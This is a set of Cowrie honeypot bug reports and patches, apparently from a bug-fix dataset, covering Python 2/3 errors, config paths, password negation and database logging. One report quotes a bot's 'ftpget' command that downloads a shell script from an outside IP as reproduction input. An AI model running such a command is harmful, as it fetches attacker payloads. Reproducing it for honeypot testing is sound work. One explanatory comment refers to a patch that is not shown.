sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
docker run -it -p 2222:2222 -p 2223:2223 cowrie/cowrie

```
2018-12-07T04:56:59+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,172.17.0.1] getting shell
2018-12-07T04:57:07+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,172.17.0.1] CMD: **ping google.com**
2018-12-07T04:57:07+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,172.17.0.1] Command found: ping google.com
2018-12-07T04:57:07+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,172.17.0.1] Unhandled Error
Traceback (most recent call last):
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/service.py", line 45, in packetReceived
    return f(packet)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/connection.py", line 249, in ssh_CHANNEL_DATA
    log.callWithLogger(channel, channel.dataReceived, data)
  --- <exception caught here> ---
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/session.py", line 112, in dataReceived
    self.client.transport.write(data)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/session.py", line 163, in write
    self.proto.dataReceived(data)
  File "/cowrie/cowrie-git/src/cowrie/insults/insults.py", line 104, in dataReceived
    insults.ServerProtocol.dataReceived(self, data)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/recvline.py", line 225, in keystrokeReceived
    m()
  File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 325, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/recvline.py", line 292, in handle_RETURN
    self.lineReceived(line)
  File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 185, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/cowrie/cowrie-git/src/cowrie/shell/honeypot.py", line 106, in lineReceived
    self.runCommand()
  File "/cowrie/cowrie-git/src/cowrie/shell/honeypot.py", line 215, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 306, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 194, in call_command
    obj.start()
  File "/cowrie/cowrie-git/src/cowrie/commands/ping.py", line 70, in start
    s = hashlib.md5(self.host).hexdigest()
builtins.TypeError: Unicode-objects must be encoded before hashing
```
It seems to be a unicode issue on Py3.
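Indeed. A short stdlib-only sketch of the Python 3 behaviour and of the deterministic fake-IP derivation that ping.py performs on the digest (mirroring the expressions visible in the patch above):

```python
import hashlib

host = 'google.com'

# Python 3: hashing a str raises TypeError; encode to bytes first
s = hashlib.md5(host.encode('utf-8')).hexdigest()

# The first four bytes of the digest become a stable fake IPv4 address
fake_ip = '.'.join(str(int(s[i:i + 2], 16)) for i in range(0, 8, 2))
print(fake_ip)  # the same host always maps to the same address
```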
2019-01-27T04:40:46
cowrie/cowrie
994
cowrie__cowrie-994
[ "975" ]
6168584a29c092f89e497b9cdf0dd87a44f82fff
diff --git a/src/cowrie/commands/free.py b/src/cowrie/commands/free.py
--- a/src/cowrie/commands/free.py
+++ b/src/cowrie/commands/free.py
@@ -57,7 +57,7 @@ def do_free(self, fmt='kilobytes'):
 
         if fmt == 'megabytes':
             # Transform KB to MB
-            for key, value in raw_mem_stats.iteritems():
+            for key, value in raw_mem_stats.items():
                 raw_mem_stats[key] = int(value / 1000)
         elif fmt == 'human':
             magnitude = ["B", "M", "G", "T", "Z"]
free -m command results in stack trace and cowrie freezes

From within cowrie (docker current 7 Dec 2018), when the command "free -m" is run, it results in the stack trace shown below. Cowrie freezes, and since many bots use free for info gathering, cowrie may miss everything subsequent to this command.

Environment:
Ubuntu 16.04
Python 3.5.2
docker pull cowrie/cowrie
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
docker run -it -p 2222:2222 -p 2223:2223 cowrie/cowrie

Console Error:

```
2018-12-07T04:53:52+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,172.17.0.1] CMD: free -m
2018-12-07T04:53:52+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,172.17.0.1] Command found: free -m
2018-12-07T04:53:52+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,172.17.0.1] Unhandled Error
Traceback (most recent call last):
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/service.py", line 45, in packetReceived
    return f(packet)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/connection.py", line 249, in ssh_CHANNEL_DATA
    log.callWithLogger(channel, channel.dataReceived, data)
  --- <exception caught here> ---
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/session.py", line 112, in dataReceived
    self.client.transport.write(data)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/session.py", line 163, in write
    self.proto.dataReceived(data)
  File "/cowrie/cowrie-git/src/cowrie/insults/insults.py", line 104, in dataReceived
    insults.ServerProtocol.dataReceived(self, data)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/recvline.py", line 225, in keystrokeReceived
    m()
  File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 325, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/recvline.py", line 292, in handle_RETURN
    self.lineReceived(line)
  File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 185, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/cowrie/cowrie-git/src/cowrie/shell/honeypot.py", line 106, in lineReceived
    self.runCommand()
  File "/cowrie/cowrie-git/src/cowrie/shell/honeypot.py", line 215, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 306, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 194, in call_command
    obj.start()
  File "/cowrie/cowrie-git/src/cowrie/shell/command.py", line 128, in start
    self.call()
  File "/cowrie/cowrie-git/src/cowrie/commands/free.py", line 41, in call
    self.do_free(fmt='megabytes')
  File "/cowrie/cowrie-git/src/cowrie/commands/free.py", line 60, in do_free
    for key, value in raw_mem_stats.iteritems():
builtins.AttributeError: 'dict' object has no attribute 'iteritems'
```
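For reference, `dict.iteritems()` was removed in Python 3, while `items()` works on both versions (on Python 2 it builds a list, which is fine for a handful of keys). A minimal sketch of the pattern the patch lands on, with made-up memory values:

```python
raw_mem_stats = {'MemTotal': 4096000, 'MemFree': 1024000}

# items() exists on both Python 2 and 3; iteritems() is Python 2 only.
# Reassigning existing keys during iteration is safe (no size change).
for key, value in raw_mem_stats.items():
    raw_mem_stats[key] = int(value / 1000)  # KB -> MB, as in do_free()

print(raw_mem_stats)
```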
2019-01-27T04:51:36
cowrie/cowrie
1002
cowrie__cowrie-1002
[ "988" ]
73f0db7540e428dd9a8d28ec3d2f9bd820b8c95e
diff --git a/src/cowrie/commands/ftpget.py b/src/cowrie/commands/ftpget.py
--- a/src/cowrie/commands/ftpget.py
+++ b/src/cowrie/commands/ftpget.py
@@ -21,7 +21,7 @@ class FTP(ftplib.FTP):
 
     def __init__(self, *args, **kwargs):
         self.source_address = kwargs.pop("source_address", None)
-        super(FTP, self).__init__(*args, **kwargs)
+        ftplib.FTP.__init__(self, *args, **kwargs)
 
     def connect(self, host='', port=0, timeout=-999, source_address=None):
         if host != '':
ftpget on python2

```
  File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 200, in ftp_download
    ftp = FTP(source_address=out_addr)
  File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 24, in __init__
    super(FTP, self).__init__(*args, **kwargs)
exceptions.TypeError: super() argument 1 must be type, not classobj
```
@micheloosterhof Can you please provide some other info, such as how to trigger this error?

It's actually Python 2! Run:

```
ftpget -v -u anonymous -p anonymous -P 21 89.46.223.247 8UsA1.sh 8UsA1.sh
```

Output:

```
2019-01-28T07:38:45.678356+0000 [SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,1,127.0.0.1] Command found: ftpget -v -u anonymous -p anonymous -P 21 89.46.223.247 8UsA1.sh 8UsA1.sh
2019-01-28T07:38:45.681785+0000 [SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,1,127.0.0.1] Unhandled Error
Traceback (most recent call last):
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/ssh/service.py", line 45, in packetReceived
    return f(packet)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/ssh/connection.py", line 249, in ssh_CHANNEL_DATA
    log.callWithLogger(channel, channel.dataReceived, data)
  --- <exception caught here> ---
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/ssh/session.py", line 112, in dataReceived
    self.client.transport.write(data)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/ssh/session.py", line 163, in write
    self.proto.dataReceived(data)
  File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 104, in dataReceived
    insults.ServerProtocol.dataReceived(self, data)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/recvline.py", line 225, in keystrokeReceived
    m()
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 325, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/recvline.py", line 292, in handle_RETURN
    self.lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 185, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 106, in lineReceived
    self.runCommand()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 215, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 306, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 194, in call_command
    obj.start()
  File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 160, in start
    result = self.ftp_download()
  File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 200, in ftp_download
    ftp = FTP(source_address=out_addr)
  File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 24, in __init__
    super(FTP, self).__init__(*args, **kwargs)
exceptions.TypeError: super() argument 1 must be type, not classobj
```
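On Python 2, `ftplib.FTP` is an old-style class, and `super()` only accepts new-style classes, hence the `classobj` TypeError; calling the base `__init__` explicitly works on both interpreter versions. A small sketch mirroring the shape of the merged patch (runnable as-is on Python 3, where the `super()` form would also have worked):

```python
import ftplib

class FTP(ftplib.FTP):
    def __init__(self, *args, **kwargs):
        self.source_address = kwargs.pop('source_address', None)
        # On Python 2, super(FTP, self).__init__(...) raises
        # "super() argument 1 must be type, not classobj" because
        # ftplib.FTP is old-style there; the explicit base-class call
        # below is portable across Python 2 and 3.
        ftplib.FTP.__init__(self, *args, **kwargs)

ftp = FTP(source_address=('0.0.0.0', 0))  # no host given, so nothing connects
print(ftp.source_address)
```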
2019-01-28T15:24:05
cowrie/cowrie
1022
cowrie__cowrie-1022
[ "1007" ]
8e16db0d247566e00f184e703c1ec843a894b7c5
diff --git a/src/cowrie/core/config.py b/src/cowrie/core/config.py
--- a/src/cowrie/core/config.py
+++ b/src/cowrie/core/config.py
@@ -8,7 +8,8 @@
 from __future__ import absolute_import, division
 
 import configparser
-import os
+from os import environ
+from os.path import abspath, dirname, exists, join
 
 
 def to_environ_key(key):
@@ -18,15 +19,16 @@ def to_environ_key(key):
 
 class EnvironmentConfigParser(configparser.ConfigParser):
 
     def has_option(self, section, option):
-        if to_environ_key('_'.join((section, option))) in os.environ:
+        if to_environ_key('_'.join((section, option))) in environ:
             return True
         return super(EnvironmentConfigParser, self).has_option(section, option)
 
     def get(self, section, option, **kwargs):
         key = to_environ_key('_'.join((section, option)))
-        if key in os.environ:
-            return os.environ[key]
-        return super(EnvironmentConfigParser, self).get(section, option, **kwargs)
+        if key in environ:
+            return environ[key]
+        return super(EnvironmentConfigParser, self).get(
+            section, option, **kwargs)
 
 
 def readConfigFile(cfgfile):
@@ -36,9 +38,26 @@ def readConfigFile(cfgfile):
     @param cfgfile: filename or array of filenames
     @return: ConfigParser object
     """
-    parser = EnvironmentConfigParser(interpolation=configparser.ExtendedInterpolation())
+    parser = EnvironmentConfigParser(
+        interpolation=configparser.ExtendedInterpolation())
     parser.read(cfgfile)
     return parser
 
 
-CONFIG = readConfigFile(("etc/cowrie.cfg.dist", "/etc/cowrie/cowrie.cfg", "etc/cowrie.cfg", "cowrie.cfg"))
+def get_config_path():
+    """Get absolute path to the config file
+    """
+    config_files = ["etc/cowrie/cowrie.cfg", "etc/cowrie.cfg",
+                    "cowrie.cfg", "etc/cowrie.cfg.dist"]
+    current_path = abspath(dirname(__file__))
+    root = "/".join(current_path.split("/")[:-3])
+
+    for file in config_files:
+        absolute_path = join(root, file)
+        if exists(absolute_path):
+            return absolute_path
+
+    print("Config file not found")
+
+
+CONFIG = readConfigFile(get_config_path())
Cowrie not set up for py.test framework

So I tried running the tests on both Python 2 and Python 3. On Python 2 all the tests passed, but on Python 3 there were errors.

```
py.test --cov=cowrie
=========================== test session starts ============================
platform linux -- Python 3.7.2, pytest-4.2.0, py-1.7.0, pluggy-0.8.1
rootdir: /home/mzfr/dev/cowrie, inifile:
plugins: cov-2.6.1
collected 3 items / 3 errors

================================== ERRORS ==================================
_________ ERROR collecting src/cowrie/test/test_base_commands.py __________
../shell/fs.py:26: in <module>
    PICKLE = pickle.load(open(CONFIG.get('shell', 'filesystem'), 'rb'))
../core/config.py:29: in get
    return super(EnvironmentConfigParser, self).get(section, option, **kwargs)
/usr/lib/python3.7/configparser.py:780: in get
    d = self._unify_values(section, vars)
/usr/lib/python3.7/configparser.py:1146: in _unify_values
    raise NoSectionError(section) from None
E   configparser.NoSectionError: No section: 'shell'

During handling of the above exception, another exception occurred:
test_base_commands.py:12: in <module>
    from cowrie.shell import protocol
../shell/protocol.py:21: in <module>
    from cowrie.shell import command
../shell/command.py:20: in <module>
    from cowrie.shell import fs
../shell/fs.py:29: in <module>
    exit(2)
/usr/lib/python3.7/_sitebuiltins.py:26: in __call__
    raise SystemExit(code)
E   SystemExit: 2
----------------------------- Captured stdout ------------------------------
ERROR: Config file not found: etc/cowrie.cfg.dist
______________ ERROR collecting src/cowrie/test/test_echo.py _______________
../shell/fs.py:26: in <module>
    PICKLE = pickle.load(open(CONFIG.get('shell', 'filesystem'), 'rb'))
../core/config.py:29: in get
    return super(EnvironmentConfigParser, self).get(section, option, **kwargs)
/usr/lib/python3.7/configparser.py:780: in get
    d = self._unify_values(section, vars)
/usr/lib/python3.7/configparser.py:1146: in _unify_values
    raise NoSectionError(section) from None
E   configparser.NoSectionError: No section: 'shell'

During handling of the above exception, another exception occurred:
test_echo.py:16: in <module>
    from cowrie.shell import protocol
../shell/protocol.py:21: in <module>
    from cowrie.shell import command
../shell/command.py:20: in <module>
    from cowrie.shell import fs
../shell/fs.py:29: in <module>
    exit(2)
/usr/lib/python3.7/_sitebuiltins.py:26: in __call__
    raise SystemExit(code)
E   SystemExit: 2
----------------------------- Captured stdout ------------------------------
ERROR: Config file not found: etc/cowrie.cfg.dist
______________ ERROR collecting src/cowrie/test/test_tftp.py _______________
../shell/fs.py:26: in <module>
    PICKLE = pickle.load(open(CONFIG.get('shell', 'filesystem'), 'rb'))
../core/config.py:29: in get
    return super(EnvironmentConfigParser, self).get(section, option, **kwargs)
/usr/lib/python3.7/configparser.py:780: in get
    d = self._unify_values(section, vars)
/usr/lib/python3.7/configparser.py:1146: in _unify_values
    raise NoSectionError(section) from None
E   configparser.NoSectionError: No section: 'shell'

During handling of the above exception, another exception occurred:
test_tftp.py:16: in <module>
    from cowrie.shell import protocol
../shell/protocol.py:21: in <module>
    from cowrie.shell import command
../shell/command.py:20: in <module>
    from cowrie.shell import fs
../shell/fs.py:29: in <module>
    exit(2)
/usr/lib/python3.7/_sitebuiltins.py:26: in __call__
    raise SystemExit(code)
E   SystemExit: 2
----------------------------- Captured stdout ------------------------------
ERROR: Config file not found: etc/cowrie.cfg.dist
```
Hi! So far we are running `Twisted Trial` as the unit testing framework. There are multiple frameworks around in Python; if there's a need to switch, then we should make a selection, but so far we are using Twisted Trial. I'm curious though, because most of it seemed to work on Py2 but not Py3? The file system issues you are having with directory paths should be the same on both versions of Python.

This is because of the config file problem. Right now we don't have an absolute path for the config files, which causes the problem. If we change [Line 44](https://github.com/cowrie/cowrie/blob/master/src/cowrie/core/config.py#L44) from

```python
CONFIG = readConfigFile(("etc/cowrie.cfg.dist", "/etc/cowrie/cowrie.cfg", "etc/cowrie.cfg", "cowrie.cfg"))
```

to

```python
CONFIG = readConfigFile(("/home/mzfr/dev/cowrie/etc/cowrie.cfg"))
```

this works fine.
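The `get_config_path()` helper in the patch resolves this by anchoring the search at a root directory derived from the module's own location. The lookup order can be replicated standalone as below; the example root path is illustrative:

```python
from os.path import exists, join

def get_config_path(root):
    # Same precedence as the patch: the first existing file wins,
    # with the .dist defaults as the final fallback.
    config_files = ["etc/cowrie/cowrie.cfg", "etc/cowrie.cfg",
                    "cowrie.cfg", "etc/cowrie.cfg.dist"]
    for name in config_files:
        candidate = join(root, name)
        if exists(candidate):
            return candidate
    return None

# In the patch, root is derived from the module location, three levels up:
#   root = "/".join(abspath(dirname(__file__)).split("/")[:-3])
print(get_config_path("/opt/cowrie"))  # e.g. /opt/cowrie/etc/cowrie.cfg if present
```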
2019-02-24T08:25:18
cowrie/cowrie
1030
cowrie__cowrie-1030
[ "797" ]
d8d9a5db55ac0d996d76893d6c6de1f6d27cb430
diff --git a/src/cowrie/core/auth.py b/src/cowrie/core/auth.py
--- a/src/cowrie/core/auth.py
+++ b/src/cowrie/core/auth.py
@@ -98,7 +98,7 @@ def adduser(self, login, passwd):
         """
         login = self.re_or_str(login)
 
-        if passwd[0] == b'!':
+        if passwd[0] == ord("!"):
             policy = False
             passwd = passwd[1:]
         else:
adding root:x:!password to userdb.txt doesn't exclude root/password as valid credentials

Fresh install. I tried to exclude 'password' or 'abc123' from the valid passwords for the user root. The file now looks like:

```
root:x:!root
root:x:!123456
root:x:!password
root:x:*
```

Restarted cowrie, but there is no way to deny login with root/password credentials. Maybe some sort of problem with the new regexp checking?
That used to work, maybe that stopped working with the new regex patch indeed.

Hello @supriyo-biswas In your patch https://github.com/micheloosterhof/cowrie/pull/763 we lost the ability to negate passwords starting with '!'. Any ideas on how to do this with regex?

Yep, experiencing the same issue here. I looked through the file and nothing stood out to me. If this doesn't get resolved I'll have more time to look at it tomorrow night.

seems to be an ordering issue, #802 should fix it

Same problem for me, but not solved by the patch

Same problem, not solved by the patch

Reopened.

@micheloosterhof I think I found what is causing the problem here. In [auth.py Line 101](https://github.com/cowrie/cowrie/blob/master/src/cowrie/core/auth.py#L101) we are checking

```python
if passwd[0] == b'!':
```

but the problem is that `passwd` is a bytes object, so `passwd[0]` gives us the integer value of the character at index 0. Ex:

```python
>>> p
b'!123456'
>>> p[0]
33
>>> ord("!")
33
```

So instead of checking for `b"!"` we need to check for its `ord("!")`:

```python
if passwd[0] == ord("!"):
```

P.S: This is again a python2/python3 issue :)
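The point generalises: on Python 3, indexing `bytes` yields an `int`, while slicing yields `bytes`, so there are several equivalent ways to test for a leading `!`. A quick REPL-style sketch:

```python
passwd = b'!123456'

print(passwd[0])                # 33 (an int on Python 3)
print(passwd[0] == b'!')        # False: int compared with bytes
print(passwd[0] == ord('!'))    # True: the merged fix
print(passwd[:1] == b'!')       # True: slicing keeps the bytes type
print(passwd.startswith(b'!'))  # True: another equivalent test
```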
2019-03-01T18:37:16
cowrie/cowrie
1049
cowrie__cowrie-1049
[ "493", "493" ]
ce6452c204b7e9026383ae85e0e34b1cdb0688c7
diff --git a/src/cowrie/output/mongodb.py b/src/cowrie/output/mongodb.py
--- a/src/cowrie/output/mongodb.py
+++ b/src/cowrie/output/mongodb.py
@@ -47,6 +47,8 @@ def start(self):
             self.col_ttylog = self.mongo_db['ttylog']
             self.col_keyfingerprints = self.mongo_db['keyfingerprints']
             self.col_event = self.mongo_db['event']
+            self.col_ipforwards = self.mongo_db['ipforwards']
+            self.col_ipforwardsdata = self.mongo_db['ipforwardsdata']
         except Exception as e:
             log.msg('output_mongodb: Error: %s' % str(e))
@@ -121,6 +123,12 @@ def write(self, entry):
         elif eventid == 'cowrie.client.fingerprint':
             self.insert_one(self.col_keyfingerprints, entry)
 
+        elif eventid == 'cowrie.direct-tcpip.request':
+            self.insert_one(self.col_ipforwards, entry)
+
+        elif eventid == 'cowrie.direct-tcpip.data':
+            self.insert_one(self.col_ipforwardsdata, entry)
+
         # Catch any other event types
         else:
             self.insert_one(self.col_event, entry)
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py
--- a/src/cowrie/output/mysql.py
+++ b/src/cowrie/output/mysql.py
@@ -204,3 +204,15 @@ def write(self, entry):
                 'INSERT INTO `keyfingerprints` (`session`, `username`, `fingerprint`) '
                 'VALUES (%s, %s, %s)',
                 (entry["session"], entry["username"], entry["fingerprint"]))
+
+        elif entry["eventid"] == 'cowrie.direct-tcpip.request':
+            self.simpleQuery(
+                'INSERT INTO `ipforwards` (`session`, `timestamp`, `dst_ip`, `dst_port`) '
+                'VALUES (%s, FROM_UNIXTIME(%s), %s, %s)',
+                (entry["session"], entry["time"], entry["dst_ip"], entry["dst_port"]))
+
+        elif entry["eventid"] == 'cowrie.direct-tcpip.data':
+            self.simpleQuery(
+                'INSERT INTO `ipforwardsdata` (`session`, `timestamp`, `dst_ip`, `dst_port`, `data`) '
+                'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)',
+                (entry["session"], entry["time"], entry["dst_ip"], entry["dst_port"], entry["data"]))
diff --git a/src/cowrie/output/sqlite.py b/src/cowrie/output/sqlite.py
--- a/src/cowrie/output/sqlite.py
+++ b/src/cowrie/output/sqlite.py
@@ -176,3 +176,15 @@ def write(self, entry):
                 'INSERT INTO `keyfingerprints` (`session`, `username`, `fingerprint`) '
                 'VALUES (?, ?, ?)',
                 (entry["session"], entry["username"], entry["fingerprint"]))
+
+        elif entry["eventid"] == 'cowrie.direct-tcpip.request':
+            self.simpleQuery(
+                'INSERT INTO `ipforwards` (`session`, `timestamp`, `dst_ip`, `dst_port`) '
+                'VALUES (?, ?, ?, ?)',
+                (entry["session"], entry["timestamp"], entry["dst_ip"], entry["dst_port"]))
+
+        elif entry["eventid"] == 'cowrie.direct-tcpip.data':
+            self.simpleQuery(
+                'INSERT INTO `ipforwardsdata` (`session`, `timestamp`, `dst_ip`, `dst_port`, `data`) '
+                'VALUES (?, ?, ?, ?, ?)',
+                (entry["session"], entry["timestamp"], entry["dst_ip"], entry["dst_port"], entry["data"]))
Support to log direct-tcpip to database backends

Currently connection attempts are only logged in logfiles and not to database backends. This would be a nice feature :)
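The SQL inserts in the patch assume `ipforwards` and `ipforwardsdata` tables exist. A plausible schema matching the inserted columns, sketched with stdlib sqlite3 — the column types here are hypothetical inferences from the INSERT statements, not cowrie's shipped schema:

```python
import sqlite3

con = sqlite3.connect(':memory:')
con.executescript("""
CREATE TABLE ipforwards (
    session   TEXT,
    timestamp TEXT,
    dst_ip    TEXT,
    dst_port  INTEGER
);
CREATE TABLE ipforwardsdata (
    session   TEXT,
    timestamp TEXT,
    dst_ip    TEXT,
    dst_port  INTEGER,
    data      TEXT
);
""")
con.execute('INSERT INTO ipforwards (session, timestamp, dst_ip, dst_port) VALUES (?, ?, ?, ?)',
            ('a1b2c3d4', '2019-03-13T23:12:50Z', '198.51.100.7', 443))
print(con.execute('SELECT * FROM ipforwards').fetchall())
```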
2019-03-13T23:12:50
cowrie/cowrie
1054
cowrie__cowrie-1054
[ "676" ]
b7a0338f46c8104fbadc06762e6c37cc75cdb4bb
diff --git a/src/cowrie/output/csirtg.py b/src/cowrie/output/csirtg.py
--- a/src/cowrie/output/csirtg.py
+++ b/src/cowrie/output/csirtg.py
@@ -39,9 +39,10 @@ def stop(self):
     def write(self, e):
         peerIP = e['src_ip']
         ts = e['timestamp']
-        system = e['system']
+        system = e.get('system', None)
 
-        if system not in ['cowrie.ssh.factory.CowrieSSHFactory', 'cowrie.telnet.transport.HoneyPotTelnetFactory']:
+        if system not in ['cowrie.ssh.factory.CowrieSSHFactory',
+                          'cowrie.telnet.transport.HoneyPotTelnetFactory']:
             return
 
         today = str(datetime.now().date())
Bug in csirtg plugin @wesyoung Not sure when this bug started, but just looked today at my honeypots and saw this happening all over the place in the logs. ``` 2018-02-11T16:53:14-0500 [twisted.internet.defer#critical] Unhandled error in Deferred: 2018-02-11T16:53:14-0500 [twisted.internet.defer#critical] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 289, in connectionLost protocol.connectionLost(reason) File "/usr/local/lib/python2.7/dist-packages/twisted/web/client.py", line 223, in connectionLost self.factory._disconnectedDeferred.callback(None) File "/usr/local/lib/python2.7/dist-packages/twisted/internet/defer.py", line 459, in callback self._startRunCallbacks(result) File "/usr/local/lib/python2.7/dist-packages/twisted/internet/defer.py", line 567, in _startRunCallbacks self._runCallbacks() --- <exception caught here> --- File "/usr/local/lib/python2.7/dist-packages/twisted/internet/defer.py", line 653, in _runCallbacks current.result = callback(current.result, *args, **kw) File "/home/cowrie/cowrie/cowrie/commands/wget.py", line 241, in error url=self.url) File "/home/cowrie/cowrie/cowrie/shell/protocol.py", line 80, in logDispatch pt.factory.logDispatch(*msg, **args) File "/home/cowrie/cowrie/cowrie/telnet/transport.py", line 43, in logDispatch output.logDispatch(*msg, **args) File "/home/cowrie/cowrie/cowrie/core/output.py", line 117, in logDispatch self.emit(ev) File "/home/cowrie/cowrie/cowrie/core/output.py", line 206, in emit self.write(ev) File "/home/cowrie/cowrie/cowrie/output/csirtg.py", line 43, in write system = 